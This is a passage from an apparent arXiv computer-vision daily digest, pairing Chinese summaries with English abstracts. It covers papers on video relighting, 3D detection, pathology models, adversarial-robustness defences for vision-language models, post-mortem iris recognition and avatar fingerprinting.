Abstract:World building with 3D scene representations is increasingly important for content creation, simulation, and interactive experiences, yet real workflows are inherently iterative: creators must repeatedly extend an existing scene under user control. Motivated by this research gap, we study 3D scene expansion in a user-centric workflow: starting from a real scene captured by multi-view images, we extend its coverage by inserting an additional view synthesized by a generative model. Unlike simple object editing or style transfer in a fixed scene, the inserted view is often 3D-misaligned with the original reconstruction, introducing geometry shifts, hallucinated content, or view-dependent artifacts that break global multi-view consistency. To address the challenge, we propose SceneExpander, which applies test-time adaptation to a parametric feed-forward 3D reconstruction model with two complementary distillation signals: anchor distillation stabilizes the original scene by distilling geometric cues from the captured views, while inserted-view self-distillation preserves observation-supported predictions yet adapts latent geometry and appearance to accommodate the misaligned inserted view. Experiments on ETH scenes and online data demonstrate improved expansion behavior and reconstruction quality under misalignment.
[CV-228] LightCtrl: Training-free Controllable Video Relighting ICLR2026
【速读】:该论文旨在解决现有视频重光照(video relighting)方法在光照控制方面缺乏显式调控能力的问题。当前基于扩散模型的方法虽能实现高质量图像和视频的重光照,但难以精确引导光照变化以匹配用户指定的光轨迹。解决方案的关键在于提出LightCtrl,其核心创新包括:一是引入光照图注入模块(Light Map Injection module),通过采样与光轨迹相关的噪声并注入到源视频的潜在表示中,提升输出视频与条件光轨迹之间的光照一致性;二是设计几何感知重光照模块(Geometry-Aware Relighting module),在频域动态融合RGB与法线图的潜在特征,有效抑制原始光照影响,从而增强对输入光轨迹的遵循能力。该方法无需训练即可实现可控视频重光照,在保持时序一致性的同时显著提升了光照控制精度。
链接: https://arxiv.org/abs/2603.27083
作者: Yizuo Peng,Xuelin Chen,Kai Zhang,Xiaodong Cun
机构: Tsinghua University (清华大学); GVC Lab, Great Bay University (大湾大学GVC实验室); Adobe Research (Adobe研究院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at ICLR 2026
Abstract:Recent diffusion models have achieved remarkable success in image relighting, and this success has quickly been extended to video relighting. However, existing methods offer limited explicit control over illumination in the relighted output. We present LightCtrl, the first controllable video relighting method that enables explicit control of video illumination through a user-supplied light trajectory in a training-free manner. Our approach combines pre-trained diffusion models: an image relighting model processes each frame individually, followed by a video diffusion prior to enhance temporal consistency. To achieve explicit control over dynamically varying lighting, we introduce two key components. First, a Light Map Injection module samples light trajectory-specific noise and injects it into the latent representation of the source video, improving illumination coherence with the conditional light trajectory. Second, a Geometry-Aware Relighting module dynamically combines RGB and normal map latents in the frequency domain to suppress the influence of the original lighting, further enhancing adherence to the input light trajectory. Experiments show that LightCtrl produces high-quality videos with diverse illumination changes that closely follow the specified light trajectory, demonstrating improved controllability over baseline methods. Code is available at: this https URL.
[CV-229] Structural Graph Probing of Vision-Language Models CVPR
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Models, VLMs)中神经元群体计算组织方式不明确的问题,特别是如何从神经拓扑结构的角度理解跨模态信息处理的内在机制。其解决方案的关键在于将每一层表示为基于神经元共激活关系的层内相关性图(within-layer correlation graph),从而揭示神经拓扑结构是否具有行为意义、如何随深度和模态变化,以及能否识别出在干预下具有因果影响力的内部组件。研究发现,相关性拓扑不仅携带可恢复的行为信号,且跨模态结构随深度逐渐收敛至一组重复出现的枢纽神经元(hub neurons),对这些神经元的靶向扰动显著改变模型输出,表明神经拓扑是连接局部解释与整体行为的有意义中间尺度,兼具可解释性与可操作性。
链接: https://arxiv.org/abs/2603.27070
作者: Haoyu He,Yue Zhuo,Yu Zheng,Qi R. Wang
机构: Northeastern University (东北大学); Massachusetts Institute of Technology (麻省理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) 2026
Abstract:Vision-language models (VLMs) achieve strong multimodal performance, yet how computation is organized across populations of neurons remains poorly understood. In this work, we study VLMs through the lens of neural topology, representing each layer as a within-layer correlation graph derived from neuron-neuron co-activations. This view allows us to ask whether population-level structure is behaviorally meaningful, how it changes across modalities and depth, and whether it identifies causally influential internal components under intervention. We show that correlation topology carries recoverable behavioral signal; moreover, cross-modal structure progressively consolidates with depth around a compact set of recurrent hub neurons, whose targeted perturbation substantially alters model output. Neural topology thus emerges as a meaningful intermediate scale for VLM interpretability: richer than local attribution, more tractable than full circuit recovery, and empirically tied to multimodal behavior. Code is publicly available at this https URL.
[CV-230] VIRST: Video-Instructed Reasoning Assistant for SpatioTemporal Segmentation CVPR2026
【速读】:该论文旨在解决现有基于固定关键帧的视频目标分割方法在处理动态变化剧烈或需要多步推理的任务时性能显著下降的问题,尤其是在运动密集型和推理导向型视频场景中表现不佳。其核心解决方案是提出一个端到端框架VIRST(Video-Instructed Reasoning Assistant for Spatio-Temporal Segmentation),通过时空融合(Spatio-Temporal Fusion, STF)机制将分割感知的视频特征融入视觉-语言主干网络,实现全局视频推理与像素级掩码预测的统一;同时引入时间动态锚点更新器(Temporal Dynamic Anchor Updater),维持相邻时间帧作为稳定的时间线索,以应对大范围运动、遮挡及目标重出现等挑战。这一设计在多种真实且具有挑战性的RVOS基准上实现了最先进的性能,展现出对指代和推理导向任务的强大泛化能力。
链接: https://arxiv.org/abs/2603.27060
作者: Jihwan Hong,Jaeyoung Do
机构: Seoul National University (首尔国立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:Referring Video Object Segmentation (RVOS) aims to segment target objects in videos based on natural language descriptions. However, fixed keyframe-based approaches that couple a vision language model with a separate propagation module often fail to capture rapidly changing spatiotemporal dynamics and to handle queries requiring multi-step reasoning, leading to sharp performance drops on motion-intensive and reasoning-oriented videos beyond static RVOS benchmarks. To address these limitations, we propose VIRST (Video-Instructed Reasoning Assistant for Spatio-Temporal Segmentation), an end-to-end framework that unifies global video reasoning and pixel-level mask prediction within a single model. VIRST bridges semantic and segmentation representations through the Spatio-Temporal Fusion (STF), which fuses segmentation-aware video features into the vision-language backbone, and employs the Temporal Dynamic Anchor Updater to maintain temporally adjacent anchor frames that provide stable temporal cues under large motion, occlusion, and reappearance. This unified design achieves state-of-the-art results across diverse RVOS benchmarks under realistic and challenging conditions, demonstrating strong generalization to both referring and reasoning oriented settings. The code and checkpoints are available at this https URL.
[CV-231] owards Intrinsic-Aware Monocular 3D Object Detection CVPR2026
【速读】:该论文旨在解决单目3D目标检测(Mono3D)中因相机内参(camera intrinsics)变化导致的性能下降和跨场景泛化能力弱的问题。现有方法对内参敏感,难以在不同相机配置下保持稳定的3D检测性能,因为内参决定了三维场景到图像平面的投影关系。解决方案的关键在于提出一种统一的内在感知框架MonoIA,其核心创新是将内参建模从传统的数值条件控制转变为基于语言-视觉语义表示的感知理解:通过大语言模型(LLM)和视觉-语言模型(VLM)生成编码相机参数视觉与几何含义的内参嵌入(intrinsic embeddings),并借助层级式内参自适应模块(Intrinsic Adaptation Module)将其融入检测网络,使模型能根据具体相机配置动态调整特征表示,从而实现跨内参的一致性3D感知。这一方法显著提升了在KITTI、Waymo和nuScenes等基准上的性能,并在多数据集训练下进一步优化。
链接: https://arxiv.org/abs/2603.27059
作者: Zhihao Zhang,Abhinav Kumar,Xiaoming Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: This paper is accepted by CVPR 2026
Abstract:Monocular 3D object detection (Mono3D) aims to infer object locations and dimensions in 3D space from a single RGB image. Despite recent progress, existing methods remain highly sensitive to camera intrinsics and struggle to generalize across diverse settings, since intrinsics govern how 3D scenes are projected onto the image plane. We propose MonoIA, a unified intrinsic-aware framework that models and adapts to intrinsic variation through a language-grounded representation. The key insight is that intrinsic variation is not a numeric difference but a perceptual transformation that alters apparent scale, perspective, and spatial geometry. To capture this effect, MonoIA employs large language models and vision-language models to generate intrinsic embeddings that encode the visual and geometric implications of camera parameters. These embeddings are hierarchically integrated into the detection network via an Intrinsic Adaptation Module, allowing the model to modulate its feature representations according to camera-specific configurations and maintain consistent 3D detection across intrinsics. This shifts intrinsic modeling from numeric conditioning to semantic representation, enabling robust and unified perception across cameras. Extensive experiments show that MonoIA achieves new state-of-the-art results on standard benchmarks including KITTI, Waymo, and nuScenes (e.g., +1.18% on the KITTI leaderboard), and further improves performance under multi-dataset training (e.g., +4.46% on KITTI Val).
[CV-232] MOOZY: A Patient-First Foundation Model for Computational Pathology
【速读】:该论文旨在解决当前计算病理学中基础模型(foundation model)在跨临床任务迁移能力不足的问题,尤其是现有方法多以单张切片(whole-slide image, WSI)为中心、依赖私有数据与昂贵的配对报告监督,并且未能显式建模同一患者多个切片之间的关联。其解决方案的关键在于提出一种“以患者为中心”的基础模型MOOZY,通过病例级Transformer(case transformer)在预训练阶段显式建模同一患者所有切片间的依赖关系,结合多阶段自监督学习(Stage 1:基于77,134张公共切片特征网格的掩码自蒸馏;Stage 2:利用56个公开数据集中的333项任务进行病例级多任务对齐),实现高效、可复现的患者层面表征学习。该设计显著提升了跨任务泛化性能,在8个保留任务上优于现有模型(如TITAN和PRISM),同时参数量仅为GigaPath的1/14,验证了患者级预训练在构建可扩展、实用的组织病理学基础模型中的有效性。
链接: https://arxiv.org/abs/2603.27048
作者: Yousef Kotp,Vincent Quoc-Huy Trinh,Christopher Pal,Mahdi S. Hosseini
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Computational pathology needs whole-slide image (WSI) foundation models that transfer across diverse clinical tasks, yet current approaches remain largely slide-centric, often depend on private data and expensive paired-report supervision, and do not explicitly model relationships among multiple slides from the same patient. We present MOOZY, a patient-first pathology foundation model in which the patient case, not the individual slide, is the core unit of representation. MOOZY explicitly models dependencies across all slides from the same patient via a case transformer during pretraining, combining multi-stage open self-supervision with scaled low-cost task supervision. In Stage 1, we pretrain a vision-only slide encoder on 77,134 public slide feature grids using masked self-distillation. In Stage 2, we align these representations with clinical semantics using a case transformer and multi-task supervision over 333 tasks from 56 public datasets, including 205 classification and 128 survival tasks across four endpoints. Across eight held-out tasks with five-fold frozen-feature probe evaluation, MOOZY achieves best or tied-best performance on most metrics and improves macro averages over TITAN by +7.37%, +5.50%, and +7.83% and over PRISM by +8.83%, +10.70%, and +9.78% for weighted F1, weighted ROC-AUC, and balanced accuracy, respectively. MOOZY is also parameter efficient with 85.77M parameters, 14x smaller than GigaPath. These results demonstrate that open, reproducible patient-level pretraining yields transferable embeddings, providing a practical path toward scalable patient-first histopathology foundation models.
[CV-233] Unified Number-Free Text-to-Motion Generation Via Flow Matching
【速读】:该论文旨在解决生成式模型在处理可变数量代理(agent)时的泛化能力不足问题,尤其是现有基于自回归机制的方法在有限领域数据下存在效率低下和误差累积的问题。其核心解决方案是提出统一运动流(Unified Motion Flow, UMF),关键在于将无数量约束的运动生成分解为单次通过的运动先验生成阶段与多次迭代的反应生成阶段:其中,金字塔运动流(Pyramid Motion Flow, P-Flow)通过分层分辨率与噪声条件控制降低计算开销;半噪声运动流(Semi-Noise Motion Flow, S-Flow)则学习联合概率路径以自适应完成反应变换与上下文重建,从而缓解误差传播。此外,UMF利用统一潜在空间弥合异构运动数据集间的分布差异,实现高效统一训练。
链接: https://arxiv.org/abs/2603.27040
作者: Guanhe Huang,Oya Celiktutan
机构: King’s College London (国王学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Generative models excel at motion synthesis for a fixed number of agents but struggle to generalize with variable agents. Based on limited, domain-specific data, existing methods employ autoregressive models to generate motion recursively, which suffer from inefficiency and error accumulation. We propose Unified Motion Flow (UMF), which consists of Pyramid Motion Flow (P-Flow) and Semi-Noise Motion Flow (S-Flow). UMF decomposes the number-free motion generation into a single-pass motion prior generation stage and multi-pass reaction generation stages. Specifically, UMF utilizes a unified latent space to bridge the distribution gap between heterogeneous motion datasets, enabling effective unified training. For motion prior generation, P-Flow operates on hierarchical resolutions conditioned on different noise levels, thereby mitigating computational overheads. For reaction generation, S-Flow learns a joint probabilistic path that adaptively performs reaction transformation and context reconstruction, alleviating error accumulation. Extensive results and user studies demonstrate UMF’ s effectiveness as a generalist model for multi-person motion generation from text. Project page: this https URL.
[CV-234] RealBirdID: Benchmarking Bird Species Identification in the Era of MLLM s CVPR26
【速读】:该论文旨在解决野外细粒度鸟类物种识别中因单一图像信息不足而导致的识别难题,尤其关注模型在面对不可回答样本时缺乏合理拒答能力的问题。传统多模态系统往往仅评估可回答案例,导致模型倾向于自信猜测而非基于证据的审慎 abstention(拒绝回答)。解决方案的关键在于提出 RealBirdID 基准测试集,该数据集为每个属提供两类样本:一类是标注了明确理由(如“需声学线索”、“图像质量低”或“视角受阻”)的不可回答示例,另一类是清晰可回答的实例;同时强调模型不仅要在可回答样本上表现准确,还需具备根据证据合理拒答的能力,从而推动细粒度识别系统向更可靠、可解释的方向发展。
链接: https://arxiv.org/abs/2603.27033
作者: Logan Lawrence,Mustafa Chasmai,Rangel Daroya,Wuao Liu,Seoyun Jeong,Aaron Sun,Max Hamilton,Fabien Delattre,Oindrila Saha,Subhransu Maji,Grant Van Horn
机构: UMass Amherst (马萨诸塞大学阿默斯特分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR26. 23 pages, 23 figures, 5 tables
Abstract:Fine-grained bird species identification in the wild is frequently unanswerable from a single image: key cues may be non-visual (e.g. vocalization), or obscured due to occlusion, camera angle, or low resolution. Yet today’s multimodal systems are typically judged on answerable, in-schema cases, encouraging confident guesses rather than principled abstention. We propose the RealBirdID benchmark: given an image of a bird, a system should either answer with a species or abstain with a concrete, evidence-based rationale: “requires vocalization,” “low quality image,” or “view obstructed”. For each genus, the dataset includes a validation split composed of curated unanswerable examples with labeled rationales, paired with a companion set of clearly answerable instances. We find that (1) the species identification on the answerable set is challenging for a variety of open-source and proprietary models (less than 13% accuracy for MLLMs including GPT-5 and Gemini-2.5 Pro), (2) models with greater classification ability are not necessarily more calibrated to abstain from unanswerable examples, and (3) that MLLMs generally fail at providing correct reasons even when they do abstain. RealBirdID establishes a focused target for abstention-aware fine-grained recognition and a recipe for measuring progress.
[CV-235] YOLO Object Detectors for Robotics – a Comparative Study
【速读】:该论文旨在解决YOLO(You Only Look Once)目标检测模型在机器人工作空间内物体检测任务中的适用性问题。其解决方案的关键在于通过实验验证不同版本YOLO模型在自定义数据集和COCO2017数据集上的性能表现,尤其在图像发生畸变条件下测试模型的鲁棒性,从而为机器人视觉任务中选择合适的YOLO版本提供依据。
链接: https://arxiv.org/abs/2603.27029
作者: Patryk Niżeniec,Marcin Iwanowski,Marcin Gahbler
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:YOLO object detectors recently became a key component of vision systems in many domains. The family of available YOLO models consists of multiple versions, each in various variants. The research reported in this paper aims to validate the applicability of members of this family to detect objects located within the robot workspace. In our experiments, we used our custom dataset and the COCO2017 dataset. To test the robustness of investigated detectors, the images of these datasets were subject to distortions. The results of our experiments, including variations of training/testing configurations and models, may support the choice of the appropriate YOLO version for robotic vision tasks.
[CV-236] Generative Shape Reconstruction with Geometry-Guided Langevin Dynamics
【速读】:该论文旨在解决从不完整或噪声观测中重建完整三维形状的难题,这一问题本质上是病态的(ill-posed),需在测量一致性与形状合理性之间取得平衡。现有方法在理想条件下可实现高几何保真度,但在真实场景下面对缺失数据或噪声时表现不佳;而基于生成模型的3D形状合成方法虽能产生高度逼真的结果,却难以与观测数据保持一致。解决方案的关键在于提出GG-Langevin:一种基于扩散模型的几何引导Langevin动力学(Geometry-Guided Langevin dynamics)的概率方法,通过在扩散模型诱导的Langevin轨迹中每一步都保持测量一致性,从而实现既符合观测数据又满足数据驱动先验的生成式重建。实验表明,该方法在几何精度和对缺失数据的鲁棒性方面优于现有表面重建方法。
链接: https://arxiv.org/abs/2603.27016
作者: Linus Härenstam-Nielsen,Dmitrii Pozdeev,Thomas Dagès,Nikita Araslanov,Daniel Cremers
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Reconstructing complete 3D shapes from incomplete or noisy observations is a fundamentally ill-posed problem that requires balancing measurement consistency with shape plausibility. Existing methods for shape reconstruction can achieve strong geometric fidelity in ideal conditions but fail under realistic conditions with incomplete measurements or noise. At the same time, recent generative models for 3D shapes can synthesize highly realistic and detailed shapes but fail to be consistent with observed measurements. In this work, we introduce GG-Langevin: Geometry-Guided Langevin dynamics, a probabilistic approach that unifies these complementary perspectives. By traversing the trajectories of Langevin dynamics induced by a diffusion model, while preserving measurement consistency at every step, we generatively reconstruct shapes that fit both the measurements and the data-informed prior. We demonstrate through extensive experiments that GG-Langevin achieves higher geometric accuracy and greater robustness to missing data than existing methods for surface reconstruction.
[CV-237] GUIDED: Granular Understanding via Identification Detection and Discrimination for Fine-Grained Open-Vocabulary Object Detection NIPS2025
【速读】:该论文针对细粒度开放词汇目标检测(Fine-grained Open-Vocabulary Object Detection, FG-OVD)中存在的语义纠缠问题展开研究,即预训练视觉语言模型(Vision-Language Model, VLM)嵌入空间中主体(subject)与属性(attribute)的语义耦合导致属性过表示、定位错误和嵌入空间中的语义漂移,从而影响检测性能。解决方案的关键在于提出GUIDED框架,通过解耦主体识别与属性感知两个子任务:首先利用语言模型提取粗粒度主体及其描述属性;随后仅用主体嵌入指导目标定位,确保定位稳定性;再引入基于注意力机制的属性嵌入融合模块,选择性地将属性信息注入检测查询以保留判别力;最后采用区域级属性判别模块,结合改进的视觉语言模型与投影头对检测区域进行精细化匹配,实现更准确的细粒度分类。该方法通过模块化设计实现了对不同任务特性的适配,显著提升了FG-OVD性能。
链接: https://arxiv.org/abs/2603.27014
作者: Jiaming Li,Zhijia Liang,Weikai Chen,Lin Ma,Guanbin Li
机构: Sun Yat-sen University (中山大学); Meituan (美团)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: NIPS2025
Abstract:Fine-grained open-vocabulary object detection (FG-OVD) aims to detect novel object categories described by attribute-rich texts. While existing open-vocabulary detectors show promise at the base-category level, they underperform in fine-grained settings due to the semantic entanglement of subjects and attributes in pretrained vision-language model (VLM) embeddings – leading to over-representation of attributes, mislocalization, and semantic drift in embedding space. We propose GUIDED, a decomposition framework specifically designed to address the semantic entanglement between subjects and attributes in fine-grained prompts. By separating object localization and fine-grained recognition into distinct pathways, HUIDED aligns each subtask with the module best suited for its respective roles. Specifically, given a fine-grained class name, we first use a language model to extract a coarse-grained subject and its descriptive attributes. Then the detector is guided solely by the subject embedding, ensuring stable localization unaffected by irrelevant or overrepresented attributes. To selectively retain helpful attributes, we introduce an attribute embedding fusion module that incorporates attribute information into detection queries in an attention-based manner. This mitigates over-representation while preserving discriminative power. Finally, a region-level attribute discrimination module compares each detected region against full fine-grained class names using a refined vision-language model with a projection head for improved alignment. Extensive experiments on FG-OVD and 3F-OVD benchmarks show that GUIDED achieves new state-of-the-art results, demonstrating the benefits of disentangled modeling and modular optimization. Our code will be released at this https URL.
[CV-238] A Provable Energy-Guided Test-Time Defense Boosting Adversarial Robustness of Large Vision-Language Models CVPR
【速读】:该论文旨在解决多模态模型和大型视觉语言模型(Large Visual-Language Models, LVLM)在面对对抗扰动时鲁棒性不足的问题,这严重影响了其在真实场景中的可靠性。解决方案的关键在于提出一种轻量级、无需训练的防御方法——能量引导的测试时变换(Energy-Guided Test-Time Transformation, ET3),该方法通过最小化输入的能量来提升分类器对对抗攻击的鲁棒性,其理论基础是在合理假设下证明该变换能够有效维持分类性能。实验证明,ET3在通用分类、CLIP零样本分类以及LVLM在图像描述生成和视觉问答等任务中均显著增强了模型鲁棒性。
链接: https://arxiv.org/abs/2603.26984
作者: Mujtaba Hussain Mirza,Antonio D’Orazio,Odelia Melamed,Iacopo Masi
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) 2026, Main Conference
Abstract:Despite the rapid progress in multimodal models and Large Visual-Language Models (LVLM), they remain highly susceptible to adversarial perturbations, raising serious concerns about their reliability in real-world use. While adversarial training has become the leading paradigm for building models that are robust to adversarial attacks, Test-Time Transformations (TTT) have emerged as a promising strategy to boost robustness at this http URL light of this, we propose Energy-Guided Test-Time Transformation (ET3), a lightweight, training-free defense that enhances the robustness by minimizing the energy of the input this http URL method is grounded in a theory that proves our transformation succeeds in classification under reasonable assumptions. We present extensive experiments demonstrating that ET3 provides a strong defense for classifiers, zero-shot classification with CLIP, and also for boosting the robustness of LVLMs in tasks such as Image Captioning and Visual Question Answering. Code is available at this http URL .
[CV-239] Beyond Mortality: Advancements in Post-Mortem Iris Recognition through Data Collection and Computer-Aided Forensic Examination
【速读】:该论文旨在解决法医虹膜识别(forensic iris recognition)领域中因尸体虹膜图像数据稀缺、采集困难以及缺乏专门针对死亡后虹膜图像比对方法所导致的进展受限问题。其关键解决方案包括:首先,构建了一个包含259名受试者、最大尸僵时间(PMI)达1674小时的新型近红外(NIR)与可见光虹膜图像数据集,并首次公开了同一受试者生前与死后均采集的数据;其次,将该数据集与现有公开的尸体虹膜样本融合,利用五种虹膜识别算法在338名死者样本上评估当前自动法医虹膜识别的性能,并分析人口统计学因素对识别效果的影响;第三,提出一种用于检测尸体虹膜图像的模型,将其视为“呈现攻击”(presentation attacks)进行处理;最后,开发了一个开源法医工具,集成三种尸体虹膜识别方法并加入可解释性模块,提升比对过程的人类可理解性。
链接: https://arxiv.org/abs/2603.26976
作者: Rasel Ahmed Bhuiyan,Parisa Farmanifard,Renu Sharma,Andrey Kuehlkamp,Aidan Boyd,Patrick J Flynn,Kevin W Bowyer,Arun Ross,Dennis Chute,Adam Czajka
机构: University of Notre Dame (圣母大学); Michigan State University (密歇根州立大学); Meta (Meta); Dutchess County Medical Examiner’s Office (达奇县法医办公室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Post-mortem iris recognition brings both hope to the forensic community (a short-term but accurate and fast means of verifying identity) as well as concerns to society (its potential illicit use in post-mortem impersonation). These hopes and concerns have grown along with the volume of research in post-mortem iris recognition. Barriers to further progress in post-mortem iris recognition include the difficult nature of data collection, and the resulting small number of approaches designed specifically for comparing iris images of deceased subjects. This paper makes several unique contributions to mitigate these barriers. First, we have collected and we offer a new dataset of NIR (compliant with ISO/IEC 19794-6 where possible) and visible-light iris images collected after demise from 259 subjects, with the largest PMI (post-mortem interval) being 1,674 hours. For one subject, the data has been collected before and after death, the first such case ever published. Second, the collected dataset was combined with publicly-available post-mortem samples to assess the current state of the art in automatic forensic iris recognition with five iris recognition methods and data originating from 338 deceased subjects. These experiments include analyses of how selected demographic factors influence recognition performance. Thirdly, this study implements a model for detecting post-mortem iris images, which can be considered as presentation attacks. Finally, we offer an open-source forensic tool integrating three post-mortem iris recognition methods with explainability elements added to make the comparison process more human-interpretable.
[CV-240] Multimodal Deep Learning for Diabetic Foot Ulcer Staging Using Integrated RGB and Thermal Imaging
【速读】:该论文旨在解决糖尿病足溃疡(Diabetic Foot Ulcer, DFU)分期分类的准确性问题,以期通过早期精准诊断降低截肢风险和医疗负担。其解决方案的关键在于开发了一种基于树莓派(Raspberry Pi)的便携式多模态成像系统,能够同步采集RGB图像与热红外图像,并构建包含1,205个样本的标注数据集(分为六类DFU阶段)。实验对比了仅使用RGB、仅使用热成像以及将热图作为第四通道融合RGB与热成像的多模态训练策略,在多个深度学习模型(DenseNet121、EfficientNetV2、InceptionV3、ResNet50、VGG16)中验证发现:融合RGB与热成像的多模态输入显著优于单一模态方法,其中VGG16模型在RGB+Thermal数据上表现最优,准确率达93.25%,F1-score为92.53%,MCC为91.03%;Grad-CAM热力图进一步表明,热通道有助于模型聚焦于温度异常区域,而RGB通道提供结构与纹理信息,二者协同提升了判别能力。
链接: https://arxiv.org/abs/2603.26952
作者: Gulengul Mermer,Mustafa Furkan Aksu,Gozde Ozsezer,Sevki Cetinkalp,Orhan Er,Mehmet Kemal Gullu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 18 pages, 7 figures
Abstract:Diabetic foot ulcers (DFU) are one of the serious complications of diabetes that can lead to amputations and high healthcare costs. Regular monitoring and early diagnosis are critical for reducing the clinical burden and the risk of amputation. The aim of this study is to investigate the impact of using multimodal images on deep learning models for the classification of DFU stages. To this end, we developed a Raspberry Pi-based portable imaging system capable of simultaneously capturing RGB and thermal images. Using this prototype, a dataset consisting of 1,205 samples was collected in a hospital setting. The dataset was labeled by experts into six distinct stages. To evaluate the models performance, we prepared three different training sets: RGB-only, thermal-only, and RGB+Thermal (with the thermal image added as a fourth channel). We trained these training sets on the DenseNet121, EfficientNetV2, InceptionV3, ResNet50, and VGG16 models. The results show that the multimodal training dataset, in which RGB and thermal data are combined across four channels, outperforms single-modal approaches. The highest performance was observed in the VGG16 model trained on the RGB+Thermal dataset. The model achieved an accuracy of 93.25%, an F1-score of 92.53%, and an MCC of 91.03%. Grad-CAM heatmap visualizations demonstrated that the thermal channel helped the model focus on the correct location by highlighting temperature anomalies in the ulcer region, while the RGB channel supported the decision-making process with complementary structural and textural information.
[CV-241] Real-time Appearance-based Gaze Estimation for Open Domains
【速读】:该论文旨在解决基于外观的瞳孔注视估计(Appearance-based Gaze Estimation, AGE)在受限场景下表现优异,但在实际非约束环境中(如佩戴面部可穿戴设备或光照不良)泛化能力显著下降的问题。核心挑战在于训练数据图像多样性不足以及跨数据集标签一致性差,尤其是在俯仰角(pitch axis)方向上存在显著偏差。解决方案的关键在于两个方面:其一,通过集成多种增强技术(如合成眼镜、口罩和不同光照条件)扩展图像流形以提升模型鲁棒性;其二,将 gaze 回归重构为多任务学习框架,引入多视角监督对比学习(multi-view supervised contrastive learning)、离散化标签分类和眼部区域分割作为辅助目标,从而缓解因数据分布差异导致的标签偏差问题。该方法无需额外人工标注数据即可实现高性能、轻量化的实时注视追踪,优于现有主流方法且参数量不足其1%。
链接: https://arxiv.org/abs/2603.26945
作者: Zhenhao Li,Zheng Liu,Seunghyun Lee,Amin Fadaeinejad,Yuanhao Yu
机构: Huawei Technologies Canada (华为技术加拿大); University of Toronto (多伦多大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Appearance-based gaze estimation (AGE) has achieved remarkable performance in constrained settings, yet we reveal a significant generalization gap where existing AGE models often fail in practical, unconstrained scenarios, particularly those involving facial wearables and poor lighting conditions. We attribute this failure to two core factors: limited image diversity and inconsistent label fidelity across different datasets, especially along the pitch axis. To address these, we propose a robust AGE framework that enhances generalization without requiring additional human-annotated data. First, we expand the image manifold via an ensemble of augmentation techniques, including synthesis of eyeglasses, masks, and varied lighting. Second, to mitigate the impact of anisotropic inter-dataset label deviation, we reformulate gaze regression as a multi-task learning problem, incorporating multi-view supervised contrastive (SupCon) learning, discretized label classification, and eye-region segmentation as auxiliary objectives. To rigorously validate our approach, we curate new benchmark datasets designed to evaluate gaze robustness under challenging conditions, a dimension largely overlooked by existing evaluation protocols. Our MobileNet-based lightweight model achieves generalization performance competitive with the state-of-the-art (SOTA) UniGaze-H, while utilizing less than 1% of its parameters, enabling high-fidelity, real-time gaze tracking on mobile devices.
[CV-242] From 3D Pose to Prose: Biomechanics-Grounded Vision–Language Coaching
【速读】:该论文旨在解决健身教练系统在实时视频流中缺乏精准、个性化动作反馈的问题,尤其是在识别运动阶段和纠正姿势错误时存在语义模糊与生物力学不一致的局限。解决方案的关键在于提出BioCoach框架,其核心创新是融合视觉外观与三维骨骼运动学(3D skeletal kinematics),通过三阶段流程实现:首先利用特定于运动的自由度选择器聚焦关键关节;其次构建结构化的生物力学上下文,结合个体形态参数与周期性约束分析;最后采用视觉-生物力学条件化反馈模块,借助交叉注意力机制生成精确且可操作的文本建议。该方法通过参数高效训练冻结视觉与语言主干网络,确保透明、个性化的推理而非单纯模式匹配,显著提升了反馈准确性与时序触发能力。
链接: https://arxiv.org/abs/2603.26938
作者: Yuyang Ji,Yixuan Shen,Shengjie Zhu,Yu Kong,Feng Liu
机构: Drexel University (德雷塞尔大学); Michigan State University (密歇根州立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We present BioCoach, a biomechanics-grounded vision–language framework for fitness coaching from streaming video. BioCoach fuses visual appearance and 3D skeletal kinematics, through a novel three-stage pipeline: an exercise-specific degree-of-freedom selector that focuses analysis on salient joints; a structured biomechanical context that pairs individualized morphometrics with cycle and constraint analysis; and a vision–biomechanics conditioned feedback module that applies cross-attention to generate precise, actionable text. Using parameter-efficient training that freezes the vision and language backbones, BioCoach yields transparent, personalized reasoning rather than pattern matching. To enable learning and fair evaluation, we augment QEVD-fit-coach with biomechanics-oriented feedback to create QEVD-bio-fit-coach, and we introduce a biomechanics-aware LLM judge metric. BioCoach delivers clear gains on QEVD-bio-fit-coach across lexical and judgment metrics while maintaining temporal triggering; on the original QEVD-fit-coach, it improves text quality and correctness with near-parity timing, demonstrating that explicit kinematics and constraints are key to accurate, phase-aware coaching.
[CV-243] Leverag ing Avatar Fingerprinting: A Multi-Generator Photorealistic Talking-Head Public Database and Benchmark
【速读】:该论文旨在解决生成式AI(Generative AI)驱动的逼真虚拟人(talking-head avatar)在跨平台和跨生成器场景下身份指纹识别(avatar fingerprinting)的可靠性问题,即判断两个虚拟人视频是否由同一操作者驱动。当前公开数据库缺乏多样性与现实性,难以支撑对现代多生成器环境下的指纹识别系统进行有效评估。解决方案的关键在于构建了一个名为AVAPrintDB的新公共多生成器对话头像数据库,涵盖三种主流生成范式的Avatar生成器(GAGAvatar、LivePortrait、HunyuanPortrait),并包含自重演(self-reenactment)与跨重演(cross-reenactment)两种场景,以模拟合法使用与身份冒用情形;同时定义了标准化且可复现的基准测试协议,并基于Foundation Models(如DINOv2和CLIP)探索新型指纹识别方法。实验表明,尽管身份相关的运动线索在合成虚拟人中具有鲁棒性,但现有系统仍高度依赖于具体生成管道和源域,凸显了未来研究需关注模型泛化能力提升。
